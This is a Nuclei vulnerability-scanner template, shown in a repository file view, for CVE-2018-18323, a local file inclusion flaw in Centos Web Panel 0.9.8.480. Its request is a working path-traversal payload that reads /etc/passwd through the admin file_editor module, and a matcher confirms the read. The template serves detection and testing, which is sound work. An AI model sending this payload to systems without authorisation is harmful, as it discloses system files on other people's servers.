nuclei-templates/cves/2018/CVE-2018-18323.yaml

35 lines
1011 B
YAML
Raw Normal View History

2021-12-01 02:26:28 +00:00
id: CVE-2018-18323
2021-12-01 02:26:28 +00:00
info:
name: Centos Web Panel 0.9.8.480 LFI
author: 0x_Akoko
severity: high
description: Centos Web Panel version 0.9.8.480 suffers from code execution, cross site scripting, and local file inclusion vulnerabilities.
reference:
- https://packetstormsecurity.com/files/149795/Centos-Web-Panel-0.9.8.480-XSS-LFI-Code-Execution.html
- http://centos-webpanel.com/
2021-12-01 02:26:28 +00:00
- https://www.cvedetails.com/cve/CVE-2018-18323
- https://seccops.com/centos-web-panel-0-9-8-480-multiple-vulnerabilities/
2021-12-01 02:26:28 +00:00
classification:
cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N
cvss-score: 7.5
cve-id: CVE-2018-18323
cwe-id: CWE-22
tags: cve,cve2018,centos,lfi
requests:
- method: GET
path:
- "{{BaseURL}}/admin/index.php?module=file_editor&file=/../../../../../../../../../../../etc/passwd"
2021-12-01 02:26:28 +00:00
matchers-condition: and
matchers:
- type: regex
regex:
- "root:[x*]:0:0"
- type: status
status:
- 200